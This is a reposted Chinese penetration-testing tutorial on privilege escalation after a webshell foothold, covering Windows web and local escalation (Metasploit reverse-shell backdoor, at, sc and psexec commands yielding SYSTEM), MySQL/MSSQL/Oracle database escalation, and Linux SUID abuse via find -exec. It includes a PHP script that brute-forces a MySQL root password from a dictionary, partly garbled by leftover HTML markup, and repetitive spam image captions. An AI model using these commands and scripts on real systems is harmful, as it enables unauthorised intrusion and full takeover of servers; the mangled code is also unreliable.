加入收藏 | 设为首页 | 会员中心 | 我要投稿 源码门户网 (https://www.92codes.com/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 站长学院 > MsSql教程 > 正文

实战遇见到的好用提权方法集合

发布时间:2022-09-30 04:33:46 所属栏目:MsSql教程 来源:网络
导读: 写在前面
权限提升对我们在深度渗透过程中起着重要作用,接下来我将介绍web提权、本地提权、数据库提权、linux提权。
权限的划分
1、system账户
Windows系统最高级别的权限是System用户权限

写在前面

权限提升对我们在深度渗透过程中起着重要作用,接下来我将介绍web提权、本地提权、数据库提权、linux提权。

权限的划分

1、system账户

Windows系统最高级别的权限是System用户权限,有一些操作需要System权限才能完成,比如修改注册表核心键值、强制结束恶意应用程序进程等。

2、管理员账户

具有最高的管理和使用权限,能改变系统所有设置,可以安装和删除程序,能访问计算机上所有的文件。除此之外,它还拥有控制其他用户的权限。

3、普通用户账户

某些功能的使用,是受到一定限制的账户,在系统中可以创建多个此类账户,也可以改变其账户类型。该账户可以访问已经安装在计算机上的程序,可以设置自己账户的图片、密码等,但无权更改大多数计算机的设置。

Web提权

获取网站权限后,我们仅仅只能对网站操作,无法对服务器进行操作,需要对服务器进行提权,获取到更高权限。

案例演示

1.上传后门文件,获取到webshell权限

1433自动抓鸡工具 提权 数据库_mssql提权_饭客网络vipwebshell提权系列课程

2.在web权限提升中,最常用的是溢出漏洞提权,用cmd去执行文件进行提权mssql提权,从下图可以清晰的看到我们在webshell看到的权限和服务器上看到的权限是不一样的。

饭客网络vipwebshell提权系列课程_1433自动抓鸡工具 提权 数据库_mssql提权

3.利用systeminfo进行信息收集,一般关注操作系统版本,打过的补丁编号。

1433自动抓鸡工具 提权 数据库_饭客网络vipwebshell提权系列课程_mssql提权

4.获取到补丁编号后,我们要进行补丁筛选,推荐两个优秀项目:wesng , windowsVulnScan。将上面收集到的信息保存到1.txt中,利用wesng进行补丁筛选

下载地址分别为:

mssql提权_1433自动抓鸡工具 提权 数据库_饭客网络vipwebshell提权系列课程

5.执行完后会将可能存在的漏洞保存在vuln.csv中

饭客网络vipwebshell提权系列课程_1433自动抓鸡工具 提权 数据库_mssql提权

6.利用MSF或特定EXP进行提权(msf要搭建在外网,才能将会话反弹到本机,内网不能反弹)生成一个5577.exe后门,webshell执行该后门,反弹的端口号为5577

Msf安装教程:

1433自动抓鸡工具 提权 数据库_饭客网络vipwebshell提权系列课程_mssql提权

7.设置监听端口为5577

饭客网络vipwebshell提权系列课程_mssql提权_1433自动抓鸡工具 提权 数据库

8.端口反弹的权限为web权限

9.利用wesng中收集到的漏洞编号,进行模块利用,并且设置反弹端口,此时的端口号应该与前面的不同,这个端口反弹的权限为提权后的权限,并且监听的回话为3,与上面的会话对应

1433自动抓鸡工具 提权 数据库_mssql提权_饭客网络vipwebshell提权系列课程

10.成功反弹system权限

1433自动抓鸡工具 提权 数据库_mssql提权_饭客网络vipwebshell提权系列课程

本地提权

获取本地普通用户的权限后,要将权限提升为更高权限,本地提权的成功概率比web提权更高。

案例演示

1.系统溢出漏洞提权

直接网上下载BitsArbitraryFileMoveExploit.exe,运行就可以提升为系统权限

1433自动抓鸡工具 提权 数据库_饭客网络vipwebshell提权系列课程_mssql提权

2.AT命令提权:

at 13:36 /interactive cmd.exe (在13:36分生成一个交互式的System权限的cmd)

使用版本:Win2000 & Win2003 & XP

1433自动抓鸡工具 提权 数据库_饭客网络vipwebshell提权系列课程_mssql提权

3.SC命令提权:

sc Create syscmd binPath= “cmd /K start” type= own type= interact #创建一个名叫syscmd的新的交互式的cmd服务

sc start syscmd #得到了system权限的cmd环境

适用版本:windows 7、8、03、08

1433自动抓鸡工具 提权 数据库_饭客网络vipwebshell提权系列课程_mssql提权

4.PS命令提权

微软工具包:

psexec.exe -accepteula -s -i -d cmd.exe

适用版本:Win2003 & Win2008

饭客网络vipwebshell提权系列课程_mssql提权_1433自动抓鸡工具 提权 数据库

数据库提权

Mysql数据库提权

利用UDF提权

在利用UDF提权时前提是我们需要知道数据库的密码,而在正常情况下MySQL数据库不支持外连,此时如果我们用工具爆破不了,可以上传脚本进行爆破,脚本如下:

  1. ?</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);font-family: "Microsoft YaHei", 微软雅黑, "Hiragino Sans GB", STXihei, 华文细黑, STHeiti, RobotoDraft, Roboto, "Helvetica Neue", Helvetica, Tahoma, "Droid Sans", "wenquanyi micro hei", FreeSans, Arimo, Arial, SimSun, 宋体, Heiti, 黑体, sans-serif;">Mysql账号密码爆破工具</span><span style="box-sizing: border-box;color: rgb(0, 0, 136);font-family: "Microsoft YaHei", 微软雅黑, "Hiragino Sans GB", STXihei, 华文细黑, STHeiti, RobotoDraft, Roboto, "Helvetica Neue", Helvetica, Tahoma, "Droid Sans", "wenquanyi micro hei", FreeSans, Arimo, Arial, SimSun, 宋体, Heiti, 黑体, sans-serif;">

  2. ? eta http-equiv="Content-Type" content="text/html; charset=utf-8">

  3. ?

  4. ?

  5. ?

    MysqlDatab aseBlasting(Mysql账号密码在线爆破工具 V1.0)

  6. ?

  7. <?php

  8. if(@$_POST['submit']){

  9. ? $host = @$_POST['host'];

  10. ? if($host!=""){

  11. ? ?$username = "root";//用户名字典

  12. ? ?$password = array('','123456','admin','root123','ccf304vn'); //密码字典

  13. ? ?echo "



    --------------------爆破状态--------------------
    ";

  14. ? ?echo "密码错误次数:";

  15. ? ?for ($i=0; $i <= count($password); $i++) {

  16. ? ? if(@mysql_connect($host, $username, $password[$i])){

  17. ? ? ? echo "

    爆破成功--密码-->"
    .@$password[$i]."";

  18. ? ? ? break;

  19. ? ? }else{

  20. ? ? ? echo $i."、";

  21. ? ? ? continue;

  22. ? ? }

  23. ? ?}

  24. ? ?echo "
    --------------------爆破结束--------------------


    ";

  25. ? }else{

  26. ? ?echo "a lert('黑客,输入数据库IP地址')";

  27. ? }

  28. }

  29. ?>





  30. ? action="MysqlDatab aseBlasting.php" method="post">

  31. ? 数据库IP地址: type="text" name="host"/>

  32. ? type="submit" value="爆破" name="submit"/>

  33. ?

有些提权网上已经写得很完整,所以接下来有的提权过程就没有演示,这是我收集的比较好的文章,请大家参考。

2.Mssql数据库提权

请参考:

3.Oracle数据库提权

分为以下三种模式:

普通用户模式

前提是拥有一个普通的Oracle连接账号,不需要DBA,并以Oracle实例运行的权限执行操作系统命令。

DBA用户模式

拥有DBA账号密码,可以省去自己手动创建存储过程的繁琐步骤,一键执行测试。

注入提升模式

拥有一个Oracle注入点,可以通过注入点执行系统命令,此种模式没有实现回显,需要自己验证。

一般Oracle数据库利用这个工具进行提权(自带以上三种提权方式)

下载地址:

饭客网络vipwebshell提权系列课程_1433自动抓鸡工具 提权 数据库_mssql提权

Linux操作系统提权

推荐两个开源的项目

信息收集脚本

LinEnum-master:

漏洞探针脚本,获取可能存在的漏洞

linux-exploit-suggester:

在进行linux提权时,推荐使用冰蝎,因为冰蝎里面有很多集成化功能,可以反弹shell到msf中。

下载地址:

案例演示

1.SUID提权

漏洞成因:在对文件进行权限设置时,给了文件suid权限,在执行该文件时,会调用特定用户

上传一个脚本到网站,利用冰蝎连接,设置反弹shell

饭客网络vipwebshell提权系列课程_1433自动抓鸡工具 提权 数据库_mssql提权

在msf中执行上面的命令,web权限反弹到msf中

饭客网络vipwebshell提权系列课程_mssql提权_1433自动抓鸡工具 提权 数据库

上传漏洞探针脚本,并执行,查看是否有suid提权的可能性

mssql提权_1433自动抓鸡工具 提权 数据库_饭客网络vipwebshell提权系列课程

执行一下命令,成功提升为root用户

touch shenghuo

find shenghuo -exec whoami \;

2.内核漏洞提权

在内核漏洞提权时,前提要是本地用户才能进行提权

请参考:

3.脏牛提权

请参考:

4.定时任务提权

请参考:

5.环境变量提权

请参考:

END

【版权说明】本作品著作权归Honeypot所有,授权补天漏洞响应平台独家享有信息网络传播权,任何第三方未经授权,不得转载。

饭客网络vipwebshell提权系列课程_1433自动抓鸡工具 提权 数据库_mssql提权

Honeypot

一个神秘且优秀的补天白帽子

敲黑板!转发≠学会,课代表给你们划重点了

复习列表

mssql提权_饭客网络vipwebshell提权系列课程_1433自动抓鸡工具 提权 数据库

分享、点赞、在看,一键三连,yyds。

mssql提权_1433自动抓鸡工具 提权 数据库_饭客网络vipwebshell提权系列课程

(编辑:源码门户网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!